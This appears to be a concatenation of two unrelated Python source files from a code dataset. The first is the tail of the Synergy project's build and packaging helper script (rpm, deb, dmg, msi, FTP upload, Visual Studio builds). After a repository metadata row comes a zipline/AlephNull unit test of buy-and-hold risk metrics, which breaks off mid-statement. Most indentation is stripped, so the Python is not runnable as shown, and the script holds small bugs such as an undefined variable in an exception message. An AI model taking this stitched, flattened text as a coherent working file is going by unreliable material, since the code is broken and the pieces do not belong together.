p = subprocess.Popen(['svn', 'info'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not get revision - svn info failed with code: ' + str(p.returncode))
m = re.search('.*Revision: (\d+).*', stdout)
if not m:
raise Exception('Could not find revision number in svn info output.')
return m.group(1)
def kill(self):
if sys.platform == 'win32':
return os.system('taskkill /F /FI "IMAGENAME eq synergy*"')
else:
raise Exception('Not implemented for platform: ' + sys.platform)
def doxygen(self):
self.enableMakeGui = False
# The conf generates doc/doxygen.cfg from cmake/doxygen.cfg.in
self.configure(self.defaultTarget, '-DCONF_DOXYGEN:BOOL=TRUE')
err = os.system('doxygen %s/%s' % (self.doc_dir, self.doxygen_filename))
if err != 0:
raise Exception('doxygen failed with error code: ' + str(err))
def dist(self, type, vcRedistDir, qtDir):
# Package is supported by default.
package_unsupported = False
unixTarget = self.defaultTarget
if type == '' or type == None:
self.dist_usage()
return
moveExt = ''
if type == 'src':
self.distSrc()
elif type == 'rpm':
if sys.platform == 'linux2':
self.distRpm()
else:
package_unsupported = True
elif type == 'deb':
if sys.platform == 'linux2':
self.distDeb()
else:
package_unsupported = True
elif type == 'win':
if sys.platform == 'win32':
#self.distNsis(vcRedistDir, qtDir)
self.distWix()
else:
package_unsupported = True
elif type == 'mac':
if sys.platform == 'darwin':
self.distMac()
else:
package_unsupported = True
else:
raise Exception('Package type not supported: ' + type)
if moveExt != '':
self.unixMove(
self.getGenerator().buildDir + '/release/*.' + moveExt,
self.getGenerator().binDir)
if package_unsupported:
raise Exception(
("Package type, '%s' is not supported for platform, '%s'")
% (type, sys.platform))
def distRpm(self):
rpmDir = self.getGenerator().buildDir + '/rpm'
if os.path.exists(rpmDir):
shutil.rmtree(rpmDir)
os.makedirs(rpmDir)
templateFile = open(self.cmake_dir + '/synergy.spec.in')
template = templateFile.read()
template = template.replace('${in:version}', self.getVersionNumber())
specPath = rpmDir + '/synergy.spec'
specFile = open(specPath, 'w')
specFile.write(template)
specFile.close()
target = '../../bin/synergy-%s-%s.rpm' % (
self.getVersionForFilename(), self.getLinuxPlatform())
try:
self.try_chdir(rpmDir)
cmd = 'rpmbuild -bb --define "_topdir `pwd`" synergy.spec'
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('rpmbuild failed: ' + str(err))
self.unixMove('RPMS/*/*.rpm', target)
cmd = 'rpmlint ' + target
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('rpmlint failed: ' + str(err))
finally:
self.restore_chdir()
def distDeb(self):
buildDir = self.getGenerator().buildDir
binDir = self.getGenerator().binDir
resDir = self.cmake_dir
package = '%s-%s-%s' % (
self.project,
self.getVersionForFilename(),
self.getLinuxPlatform())
debDir = '%s/deb' % buildDir
if os.path.exists(debDir):
shutil.rmtree(debDir)
metaDir = '%s/%s/DEBIAN' % (debDir, package)
os.makedirs(metaDir)
templateFile = open(resDir + '/deb/control.in')
template = templateFile.read()
template = template.replace('${in:version}',
self.getVersionNumber())
template = template.replace('${in:arch}',
self.getDebianArch())
controlPath = '%s/control' % metaDir
controlFile = open(controlPath, 'w')
controlFile.write(template)
controlFile.close()
targetBin = '%s/%s/usr/bin' % (debDir, package)
targetPlugin = '%s/%s/usr/lib/synergy/plugins' % (debDir, package)
targetShare = '%s/%s/usr/share' % (debDir, package)
targetApplications = "%s/applications" % targetShare
targetIcons = "%s/icons" % targetShare
targetDocs = "%s/doc/%s" % (targetShare, self.project)
os.makedirs(targetBin)
os.makedirs(targetPlugin)
os.makedirs(targetApplications)
os.makedirs(targetIcons)
os.makedirs(targetDocs)
for root, dirs, files in os.walk(debDir):
for d in dirs:
os.chmod(os.path.join(root, d), 0o0755)
binFiles = ['synergy', 'synergyc', 'synergys', 'synergyd', 'syntool']
for f in binFiles:
shutil.copy("%s/%s" % (binDir, f), targetBin)
target = "%s/%s" % (targetBin, f)
os.chmod(target, 0o0755)
err = os.system("strip " + target)
if err != 0:
raise Exception('strip failed: ' + str(err))
pluginDir = "%s/plugins" % binDir
pluginFiles = [ 'libns.so']
for f in pluginFiles:
shutil.copy("%s/%s" % (pluginDir, f), targetPlugin)
target = "%s/%s" % (targetPlugin, f)
os.chmod(target, 0o0644)
err = os.system("strip " + target)
if err != 0:
raise Exception('strip failed: ' + str(err))
shutil.copy("%s/synergy.desktop" % resDir, targetApplications)
shutil.copy("%s/synergy.ico" % resDir, targetIcons)
docTarget = "%s/doc/%s" % (targetShare, self.project)
copyrightPath = "%s/deb/copyright" % resDir
shutil.copy(copyrightPath, docTarget)
shutil.copy("%s/deb/changelog" % resDir, docTarget)
os.system("gzip -9 %s/changelog" % docTarget)
if err != 0:
raise Exception('gzip failed: ' + str(err))
for root, dirs, files in os.walk(targetShare):
for f in files:
os.chmod(os.path.join(root, f), 0o0644)
target = '../../bin/%s.deb' % package
try:
self.try_chdir(debDir)
# TODO: consider dpkg-buildpackage (higher level tool)
cmd = 'fakeroot dpkg-deb --build %s' % package
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('dpkg-deb failed: ' + str(err))
cmd = 'lintian %s.deb' % package
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('lintian failed: ' + str(err))
self.unixMove('*.deb', target)
finally:
self.restore_chdir()
def distSrc(self):
name = '%s-%s-%s' % (
self.project,
self.getVersionForFilename(),
'Source')
exportPath = self.getGenerator().buildDir + '/' + name
if os.path.exists(exportPath):
print "Removing existing export..."
shutil.rmtree(exportPath)
os.mkdir(exportPath)
cmd = "git archive %s | tar -x -C %s" % (
self.getGitBranchName(), exportPath)
print 'Exporting repository to: ' + exportPath
err = os.system(cmd)
if err != 0:
raise Exception('Repository export failed: ' + str(err))
packagePath = '../' + self.getGenerator().binDir + '/' + name + '.tar.gz'
try:
self.try_chdir(self.getGenerator().buildDir)
print 'Packaging to: ' + packagePath
err = os.system('tar cfvz ' + packagePath + ' ' + name)
if err != 0:
raise Exception('Package failed: ' + str(err))
finally:
self.restore_chdir()
def unixMove(self, source, dest):
print 'Moving ' + source + ' to ' + dest
err = os.system('mv ' + source + ' ' + dest)
if err != 0:
raise Exception('Package failed: ' + str(err))
def distMac(self):
self.loadConfig()
binDir = self.getGenerator().getBinDir('Release')
name = "Synergy"
dist = binDir + "/" + name
# ensure dist dir is clean
if os.path.exists(dist):
shutil.rmtree(dist)
os.makedirs(dist)
shutil.move(binDir + "/" + name + ".app", dist + "/" + name + ".app")
self.try_chdir(dist)
err = os.system("ln -s /Applications")
self.restore_chdir()
fileName = "%s-%s-%s.dmg" % (
self.project,
self.getVersionForFilename(),
self.getMacPackageName())
cmd = "hdiutil create " + fileName + " -srcfolder ./" + name + "/ -ov"
self.try_chdir(binDir)
err = os.system(cmd)
self.restore_chdir()
def distWix(self):
generator = self.getGeneratorFromConfig().cmakeName
arch = 'x86'
if generator.endswith('Win64'):
arch = 'x64'
version = self.getVersionNumber()
args = "/p:DefineConstants=\"Version=%s\"" % version
self.run_vcbuild(
generator, 'release', 'synergy.sln', args,
'src/setup/win32/', 'x86')
filename = "%s-%s-Windows-%s.msi" % (
self.project,
self.getVersionForFilename(),
arch)
old = "bin/Release/synergy.msi"
new = "bin/Release/%s" % (filename)
try:
os.remove(new)
except OSError:
pass
os.rename(old, new)
def distNsis(self, vcRedistDir, qtDir):
if vcRedistDir == '':
raise Exception(
'VC++ redist dir path not specified (--vcredist-dir).')
if qtDir == '':
raise Exception(
'QT SDK dir path not specified (--qt-dir).')
generator = self.getGeneratorFromConfig().cmakeName
arch = 'x86'
installDirVar = '$PROGRAMFILES32'
if generator.endswith('Win64'):
arch = 'x64'
installDirVar = '$PROGRAMFILES64'
templateFile = open(self.cmake_dir + '\Installer.nsi.in')
template = templateFile.read()
template = template.replace('${in:version}', self.getVersionNumber())
template = template.replace('${in:arch}', arch)
template = template.replace('${in:vcRedistDir}', vcRedistDir)
template = template.replace('${in:qtDir}', qtDir)
template = template.replace('${in:installDirVar}', installDirVar)
nsiPath = self.getGenerator().buildDir + '\Installer.nsi'
nsiFile = open(nsiPath, 'w')
nsiFile.write(template)
nsiFile.close()
command = 'makensis ' + nsiPath
print 'NSIS command: ' + command
err = os.system(command)
if err != 0:
raise Exception('Package failed: ' + str(err))
def getVersionNumber(self):
cmakeFile = open('CMakeLists.txt')
cmake = cmakeFile.read()
majorRe = re.search('VERSION_MAJOR (\d+)', cmake)
major = majorRe.group(1)
minorRe = re.search('VERSION_MINOR (\d+)', cmake)
minor = minorRe.group(1)
revRe = re.search('VERSION_REV (\d+)', cmake)
rev = revRe.group(1)
return "%s.%s.%s" % (major, minor, rev)
def getVersionStage(self):
cmakeFile = open('CMakeLists.txt')
cmake = cmakeFile.read()
stageRe = re.search('VERSION_STAGE (\w+)', cmake)
return stageRe.group(1)
def getVersionForFilename(self):
versionStage = self.getVersionStage()
gitBranch = self.getGitBranchName()
gitRevision = self.getGitRevision()
return "%s-%s-%s" % (gitBranch, versionStage, gitRevision)
def distftp(self, type, ftp):
if not type:
raise Exception('Platform type not specified.')
self.loadConfig()
binDir = self.getGenerator().getBinDir('Release')
filename = self.getDistFilename(type)
packageSource = binDir + '/' + filename
packageTarget = filename
ftp.upload(packageSource, packageTarget)
if type != 'src':
pluginsDir = binDir + '/plugins'
nsPluginSource = self.findLibraryFile(type, pluginsDir, 'ns')
if nsPluginSource:
nsPluginTarget = self.getLibraryDistFilename(type, pluginsDir, 'ns')
ftp.upload(nsPluginSource, nsPluginTarget, "plugins")
def getLibraryDistFilename(self, type, dir, name):
(platform, packageExt, libraryExt) = self.getDistributePlatformInfo(type)
firstPart = '%s-%s-%s' % (name, self.getVersionForFilename(), platform)
filename = '%s.%s' % (firstPart, libraryExt)
if type == 'rpm' or type == 'deb':
			# linux is a bit special, include dist type (deb/rpm) in filename
filename = '%s-%s.%s' % (firstPart, packageExt, libraryExt)
return filename
def findLibraryFile(self, type, dir, name):
if not os.path.exists(dir):
return None
(platform, packageExt, libraryExt) = self.getDistributePlatformInfo(type)
ext = libraryExt
pattern = name + '\.' + ext
for filename in os.listdir(dir):
if re.search(pattern, filename):
return dir + '/' + filename
return None
def getDistributePlatformInfo(self, type):
ext = None
libraryExt = None
platform = None
if type == 'src':
ext = 'tar.gz'
platform = 'Source'
elif type == 'rpm' or type == 'deb':
ext = type
libraryExt = 'so'
platform = self.getLinuxPlatform()
elif type == 'win':
# get platform based on last generator used
ext = 'msi'
libraryExt = 'dll'
generator = self.getGeneratorFromConfig().cmakeName
if generator.find('Win64') != -1:
platform = 'Windows-x64'
else:
platform = 'Windows-x86'
elif type == 'mac':
ext = "dmg"
libraryExt = 'dylib'
platform = self.getMacPackageName()
if not platform:
raise Exception('Unable to detect distributable platform.')
return (platform, ext, libraryExt)
def getDistFilename(self, type):
pattern = self.getVersionForFilename()
for filename in os.listdir(self.getBinDir('Release')):
if re.search(pattern, filename):
return filename
raise Exception('Could not find package name with pattern: ' + pattern)
def getDebianArch(self):
if os.uname()[4][:3] == 'arm':
return 'armhf'
# os_bits should be loaded with '32bit' or '64bit'
import platform
(os_bits, other) = platform.architecture()
# get platform based on current platform
if os_bits == '32bit':
return 'i386'
elif os_bits == '64bit':
return 'amd64'
else:
raise Exception("unknown os bits: " + os_bits)
def getLinuxPlatform(self):
if os.uname()[4][:3] == 'arm':
return 'Linux-armv6l'
# os_bits should be loaded with '32bit' or '64bit'
import platform
(os_bits, other) = platform.architecture()
# get platform based on current platform
if os_bits == '32bit':
return 'Linux-i686'
elif os_bits == '64bit':
return 'Linux-x86_64'
else:
raise Exception("unknown os bits: " + os_bits)
def dist_usage(self):
print ('Usage: %s package [package-type]\n'
'\n'
'Replace [package-type] with one of:\n'
' src .tar.gz source (Posix only)\n'
' rpm .rpm package (Red Hat)\n'
			'  deb    .deb package (Debian)\n'
' win .exe installer (Windows)\n'
' mac .dmg package (Mac OS X)\n'
'\n'
'Example: %s package src-tgz') % (self.this_cmd, self.this_cmd)
def about(self):
print ('Help Me script, from the Synergy project.\n'
'%s\n'
'\n'
'For help, run: %s help') % (self.website_url, self.this_cmd)
def try_chdir(self, dir):
global prevdir
if dir == '':
prevdir = ''
return
# Ensure temp build dir exists.
if not os.path.exists(dir):
print 'Creating dir: ' + dir
os.makedirs(dir)
prevdir = os.path.abspath(os.curdir)
# It will exist by this point, so it's safe to chdir.
print 'Entering dir: ' + dir
os.chdir(dir)
def restore_chdir(self):
global prevdir
if prevdir == '':
return
print 'Going back to: ' + prevdir
os.chdir(prevdir)
def open_internal(self, project_filename, application = ''):
if not os.path.exists(project_filename):
raise Exception('Project file (%s) not found, run hm conf first.' % project_filename)
else:
path = project_filename
if application != '':
path = application + ' ' + path
err = os.system(path)
if err != 0:
				raise Exception('Could not open project with error code: ' + str(err))
def setup(self, target=''):
print "Running setup..."
oldGenerator = self.findGeneratorFromConfig()
if not oldGenerator == None:
for target in ['debug', 'release']:
buildDir = oldGenerator.getBuildDir(target)
cmakeCacheFilename = 'CMakeCache.txt'
if buildDir != '':
cmakeCacheFilename = buildDir + '/' + cmakeCacheFilename
if os.path.exists(cmakeCacheFilename):
print "Removing %s, since generator changed." % cmakeCacheFilename
os.remove(cmakeCacheFilename)
# always either get generator from args, or prompt user when
# running setup
generator = self.get_generator_from_prompt()
config = self.getConfig()
config.set('hm', 'setup_version', self.setup_version)
# store the generator so we don't need to ask again
config.set('cmake', 'generator', generator)
self.write_config(config)
# for all targets, set conf not run
self.setConfRun('all', False)
self.setConfRun('debug', False)
self.setConfRun('release', False)
print "Setup complete."
def getConfig(self):
if os.path.exists(self.configFilename):
config = ConfigParser.ConfigParser()
config.read(self.configFilename)
else:
config = ConfigParser.ConfigParser()
if not config.has_section('hm'):
config.add_section('hm')
if not config.has_section('cmake'):
config.add_section('cmake')
return config
def write_config(self, config, target=''):
if not os.path.isdir(self.configDir):
os.mkdir(self.configDir)
configfile = open(self.configFilename, 'wb')
config.write(configfile)
def getGeneratorFromConfig(self):
generator = self.findGeneratorFromConfig()
if generator:
return generator
raise Exception("Could not find generator: " + name)
def findGeneratorFromConfig(self):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
if not config.has_section('cmake'):
return None
name = config.get('cmake', 'generator')
generators = self.get_generators()
keys = generators.keys()
keys.sort()
for k in keys:
if generators[k].cmakeName == name:
return generators[k]
return None
def min_setup_version(self, version):
if os.path.exists(self.configFilename):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
try:
return config.getint('hm', 'setup_version') >= version
except:
return False
else:
return False
def hasConfRun(self, target):
if self.min_setup_version(2):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
try:
return config.getboolean('hm', 'conf_done_' + target)
except:
return False
else:
return False
def setConfRun(self, target, hasRun=True):
if self.min_setup_version(3):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
config.set('hm', 'conf_done_' + target, hasRun)
self.write_config(config)
else:
raise Exception("User does not have correct setup version.")
def get_generators(self):
if sys.platform == 'win32':
return self.win32_generators
elif sys.platform in ['linux2', 'sunos5', 'freebsd7', 'aix5']:
return self.unix_generators
elif sys.platform == 'darwin':
return self.darwin_generators
else:
raise Exception('Unsupported platform: ' + sys.platform)
def get_generator_from_prompt(self):
return self.getGenerator().cmakeName
def getGenerator(self):
generators = self.get_generators()
if len(generators.keys()) == 1:
return generators[generators.keys()[0]]
# if user has specified a generator as an argument
if self.generator_id:
return generators[int(self.generator_id)]
conf = self.findGeneratorFromConfig()
if conf:
return conf
raise Exception(
'Generator not specified, use -g arg ' +
'(use `hm genlist` for a list of generators).')
def setup_generator_prompt(self, generators):
if self.no_prompts:
raise Exception('User prompting is disabled.')
prompt = 'Enter a number:'
print prompt,
generator_id = raw_input()
if generator_id in generators:
print 'Selected generator:', generators[generator_id]
else:
print 'Invalid number, try again.'
self.setup_generator_prompt(generators)
return generators[generator_id]
def get_vcvarsall(self, generator):
import platform, _winreg
# os_bits should be loaded with '32bit' or '64bit'
(os_bits, other) = platform.architecture()
# visual studio is a 32-bit app, so when we're on 64-bit, we need to check the WoW dungeon
if os_bits == '64bit':
key_name = r'SOFTWARE\Wow6432Node\Microsoft\VisualStudio\SxS\VS7'
else:
key_name = r'SOFTWARE\Microsoft\VisualStudio\SxS\VC7'
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, key_name)
except:
raise Exception('Unable to open Visual Studio registry key. Application may not be installed.')
if generator.startswith('Visual Studio 8'):
value,type = _winreg.QueryValueEx(key, '8.0')
elif generator.startswith('Visual Studio 9'):
value,type = _winreg.QueryValueEx(key, '9.0')
elif generator.startswith('Visual Studio 10'):
value,type = _winreg.QueryValueEx(key, '10.0')
else:
raise Exception('Cannot determine vcvarsall.bat location for: ' + generator)
# not sure why, but the value on 64-bit differs slightly to the original
if os_bits == '64bit':
path = value + r'vc\vcvarsall.bat'
else:
path = value + r'vcvarsall.bat'
if not os.path.exists(path):
raise Exception("'%s' not found." % path)
return path
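	# --- Editor's illustrative sketch (not part of the original script) ---
	# How the registry lookup above resolves vcvarsall.bat, assuming a 64-bit
	# Windows host with Visual Studio 9 installed (the install path below is an
	# assumption for illustration only):
	#   platform.architecture() -> ('64bit', 'WindowsPE')
	#   key   = HKLM\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\SxS\VS7
	#   value = _winreg.QueryValueEx(key, '9.0')[0]
	#           e.g. 'C:\Program Files (x86)\Microsoft Visual Studio 9.0\'
	#   path  = value + r'vc\vcvarsall.bat'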
def run_vcbuild(self, generator, mode, solution, args='', dir='', config32='Win32'):
import platform
# os_bits should be loaded with '32bit' or '64bit'
(os_bits, other) = platform.architecture()
		# Now we choose the parameters based on OS 32/64 and our target 32/64
# http://msdn.microsoft.com/en-us/library/x4d2c09s%28VS.80%29.aspx
# valid options are only: ia64 amd64 x86_amd64 x86_ia64
		# but calling vcvarsall.bat does not guarantee that it will work
		# ret code from vcvarsall.bat is always 0 so the only way of knowing that it worked is by analysing the text output
		# MS bug: install VS9, FeaturePack, VS9SP1 and you'll obtain a vcvarsall.bat that fails.
if generator.find('Win64') != -1:
# target = 64bit
if os_bits == '32bit':
vcvars_platform = 'x86_amd64' # 32bit OS building 64bit app
else:
vcvars_platform = 'amd64' # 64bit OS building 64bit app
config_platform = 'x64'
else: # target = 32bit
vcvars_platform = 'x86' # 32/64bit OS building 32bit app
config_platform = config32
if mode == 'release':
config = 'Release'
else:
config = 'Debug'
if generator.startswith('Visual Studio 10'):
cmd = ('@echo off\n'
'call "%s" %s \n'
'cd "%s"\n'
'msbuild /nologo %s /p:Configuration="%s" /p:Platform="%s" "%s"'
) % (self.get_vcvarsall(generator), vcvars_platform, dir, args, config, config_platform, solution)
else:
config = config + '|' + config_platform
cmd = ('@echo off\n'
'call "%s" %s \n'
'cd "%s"\n'
'vcbuild /nologo %s "%s" "%s"'
) % (self.get_vcvarsall(generator), vcvars_platform, dir, args, solution, config)
# Generate a batch file, since we can't use environment variables directly.
temp_bat = self.getBuildDir() + r'\vcbuild.bat'
file = open(temp_bat, 'w')
file.write(cmd)
file.close()
err = os.system(temp_bat)
if err != 0:
raise Exception('Microsoft compiler failed with error code: ' + str(err))
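	# --- Editor's illustrative sketch (not part of the original script) ---
	# Summary of the vcvarsall/platform selection in run_vcbuild above; this
	# restates the branches, it adds no new rules:
	#   generator contains 'Win64', host 32bit -> vcvars 'x86_amd64', platform 'x64'
	#   generator contains 'Win64', host 64bit -> vcvars 'amd64',     platform 'x64'
	#   any other generator (32-bit target)    -> vcvars 'x86',       platform config32 (default 'Win32')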
def ensure_setup_latest(self):
if not self.min_setup_version(self.setup_version):
self.setup()
def reformat(self):
err = os.system(
r'tool\astyle\AStyle.exe '
'--quiet --suffix=none --style=java --indent=force-tab=4 --recursive '
'lib/*.cpp lib/*.h cmd/*.cpp cmd/*.h')
if err != 0:
raise Exception('Reformat failed with error code: ' + str(err))
def printGeneratorList(self):
generators = self.get_generators()
keys = generators.keys()
keys.sort()
for k in keys:
print str(k) + ': ' + generators[k].cmakeName
def getMacVersion(self):
if not self.macSdk:
raise Exception("Mac OS X SDK not set.")
result = re.search('(\d+)\.(\d+)', self.macSdk)
if not result:
			print self.macSdk
raise Exception("Could not find Mac OS X version.")
major = int(result.group(1))
minor = int(result.group(2))
return (major, minor)
def getMacPackageName(self):
(major, minor) = self.getMacVersion()
if major == 10:
if minor <= 4:
# 10.4: intel and power pc
arch = "Universal"
elif minor <= 6:
# 10.5: 32-bit intel
arch = "i386"
else:
# 10.7: 64-bit intel (gui only)
arch = "x86_64"
else:
raise Exception("Mac OS major version unknown: " +
str(major))
# version is major and minor with no dots (e.g. 106)
version = str(major) + str(minor)
return "MacOSX%s-%s" % (version, arch)
def reset(self):
if os.path.exists('build'):
shutil.rmtree('build')
if os.path.exists('bin'):
shutil.rmtree('bin')
if os.path.exists('lib'):
shutil.rmtree('lib')
if os.path.exists('src/gui/tmp'):
shutil.rmtree('src/gui/tmp')
# qt 4.3 generates ui_ files.
for filename in glob.glob("src/gui/ui_*"):
os.remove(filename)
# the command handler should be called only from hm.py (i.e. directly
# from the command prompt). the purpose of this class is so that we
# don't need to do argument handling all over the place in the internal
# commands class.
class CommandHandler:
ic = InternalCommands()
build_targets = []
vcRedistDir = ''
qtDir = ''
def __init__(self, argv, opts, args, verbose):
self.ic.verbose = verbose
self.opts = opts
self.args = args
for o, a in self.opts:
if o == '--no-prompts':
self.ic.no_prompts = True
elif o in ('-g', '--generator'):
self.ic.generator_id = a
elif o == '--skip-gui':
self.ic.enableMakeGui = False
elif o == '--skip-core':
self.ic.enableMakeCore = False
elif o in ('-d', '--debug'):
self.build_targets += ['debug',]
elif o in ('-r', '--release'):
self.build_targets += ['release',]
elif o == '--vcredist-dir':
self.vcRedistDir = a
elif o == '--qt-dir':
self.qtDir = a
elif o == '--mac-sdk':
self.ic.macSdk = a
elif o == '--mac-identity':
self.ic.macIdentity = a
def about(self):
self.ic.about()
def setup(self):
self.ic.setup()
def configure(self):
self.ic.configureAll(self.build_targets)
def build(self):
self.ic.build(self.build_targets)
def clean(self):
self.ic.clean(self.build_targets)
def update(self):
self.ic.update()
def install(self):
print 'Not yet implemented: install'
def doxygen(self):
self.ic.doxygen()
def dist(self):
type = None
if len(self.args) > 0:
type = self.args[0]
self.ic.dist(type, self.vcRedistDir, self.qtDir)
def distftp(self):
type = None
host = None
user = None
password = None
dir = None
if len(self.args) > 0:
type = self.args[0]
for o, a in self.opts:
if o == '--host':
host = a
elif o == '--user':
user = a
elif o == '--pass':
password = a
elif o == '--dir':
dir = a
if not host:
raise Exception('FTP host was not specified.')
ftp = ftputil.FtpUploader(
host, user, password, dir)
self.ic.distftp(type, ftp)
def destroy(self):
self.ic.destroy()
def kill(self):
self.ic.kill()
def usage(self):
self.ic.usage()
def revision(self):
self.ic.revision()
def reformat(self):
self.ic.reformat()
def open(self):
self.ic.open()
def genlist(self):
self.ic.printGeneratorList()
def reset(self):
self.ic.reset()
def signwin(self):
pfx = None
pwd = None
dist = False
for o, a in self.opts:
if o == '--pfx':
pfx = a
elif o == '--pwd':
pwd = a
elif o == '--dist':
dist = True
self.ic.signwin(pfx, pwd, dist)
def signmac(self):
self.ic.signmac()
| gpl-2.0 | 8,686,066,971,684,435,000 | 26.578688 | 116 | 0.64944 | false |
CarterBain/AlephNull | tests/test_events_through_risk.py | 3 | 11456 | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import datetime
import pytz
import numpy as np
from zipline.finance.trading import SimulationParameters
from zipline.finance import trading
from zipline.algorithm import TradingAlgorithm
from zipline.protocol import (
Event,
DATASOURCE_TYPE
)
class BuyAndHoldAlgorithm(TradingAlgorithm):
SID_TO_BUY_AND_HOLD = 1
def initialize(self):
self.holding = False
def handle_data(self, data):
if not self.holding:
self.order(self.SID_TO_BUY_AND_HOLD, 100)
self.holding = True
class TestEventsThroughRisk(unittest.TestCase):
def test_daily_buy_and_hold(self):
start_date = datetime.datetime(
year=2006,
month=1,
day=3,
hour=0,
minute=0,
tzinfo=pytz.utc)
end_date = datetime.datetime(
year=2006,
month=1,
day=5,
hour=0,
minute=0,
tzinfo=pytz.utc)
sim_params = SimulationParameters(
period_start=start_date,
period_end=end_date,
emission_rate='daily'
)
algo = BuyAndHoldAlgorithm(
sim_params=sim_params,
data_frequency='daily')
first_date = datetime.datetime(2006, 1, 3, tzinfo=pytz.utc)
second_date = datetime.datetime(2006, 1, 4, tzinfo=pytz.utc)
third_date = datetime.datetime(2006, 1, 5, tzinfo=pytz.utc)
trade_bar_data = [
Event({
'open_price': 10,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': first_date,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 15,
'close_price': 20,
'price': 20,
'volume': 2000,
'sid': 1,
'dt': second_date,
'source_id': 'test_list',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 20,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': third_date,
'source_id': 'test_list',
'type': DATASOURCE_TYPE.TRADE
}),
]
benchmark_data = [
Event({
'returns': 0.1,
'dt': first_date,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.2,
'dt': second_date,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.4,
'dt': third_date,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
]
algo.benchmark_return_source = benchmark_data
algo.sources = list([trade_bar_data])
gen = algo._create_generator(sim_params)
# TODO: Hand derive these results.
        # Currently, the output from the time of this writing serves
        # at least as an early warning against changes.
expected_algorithm_returns = {
first_date: 0.0,
second_date: -0.000350,
third_date: -0.050018
}
# TODO: Hand derive these results.
        # Currently, the output from the time of this writing serves
        # at least as an early warning against changes.
expected_sharpe = {
first_date: np.nan,
second_date: -31.56903265,
third_date: -11.459888981,
}
for bar in gen:
current_dt = algo.datetime
crm = algo.perf_tracker.cumulative_risk_metrics
np.testing.assert_almost_equal(
crm.algorithm_returns[current_dt],
expected_algorithm_returns[current_dt],
decimal=6)
np.testing.assert_almost_equal(
crm.metrics.sharpe[current_dt],
expected_sharpe[current_dt],
decimal=6,
err_msg="Mismatch at %s" % (current_dt,))
def test_minute_buy_and_hold(self):
with trading.TradingEnvironment():
start_date = datetime.datetime(
year=2006,
month=1,
day=3,
hour=0,
minute=0,
tzinfo=pytz.utc)
end_date = datetime.datetime(
year=2006,
month=1,
day=5,
hour=0,
minute=0,
tzinfo=pytz.utc)
sim_params = SimulationParameters(
period_start=start_date,
period_end=end_date,
emission_rate='daily',
data_frequency='minute')
algo = BuyAndHoldAlgorithm(
sim_params=sim_params,
data_frequency='minute')
first_date = datetime.datetime(2006, 1, 3, tzinfo=pytz.utc)
first_open, first_close = \
trading.environment.get_open_and_close(first_date)
second_date = datetime.datetime(2006, 1, 4, tzinfo=pytz.utc)
second_open, second_close = \
trading.environment.get_open_and_close(second_date)
third_date = datetime.datetime(2006, 1, 5, tzinfo=pytz.utc)
third_open, third_close = \
trading.environment.get_open_and_close(third_date)
benchmark_data = [
Event({
'returns': 0.1,
'dt': first_close,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.2,
'dt': second_close,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.4,
'dt': third_close,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
]
trade_bar_data = [
Event({
'open_price': 10,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': first_open,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 10,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': first_open + datetime.timedelta(minutes=10),
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 15,
'close_price': 20,
'price': 20,
'volume': 2000,
'sid': 1,
'dt': second_open,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 15,
'close_price': 20,
'price': 20,
'volume': 2000,
'sid': 1,
'dt': second_open + datetime.timedelta(minutes=10),
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 20,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': third_open,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 20,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': third_open + datetime.timedelta(minutes=10),
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
]
algo.benchmark_return_source = benchmark_data
algo.sources = list([trade_bar_data])
gen = algo._create_generator(sim_params)
crm = algo.perf_tracker.cumulative_risk_metrics
first_msg = gen.next()
self.assertIsNotNone(first_msg,
"There should be a message emitted.")
# Protects against bug where the positions appeared to be
# a day late, because benchmarks were triggering
# calculations before the events for the day were
# processed.
self.assertEqual(1, len(algo.portfolio.positions), "There should "
"be one position after the first day.")
self.assertEquals(
0,
crm.metrics.algorithm_volatility[algo.datetime.date()],
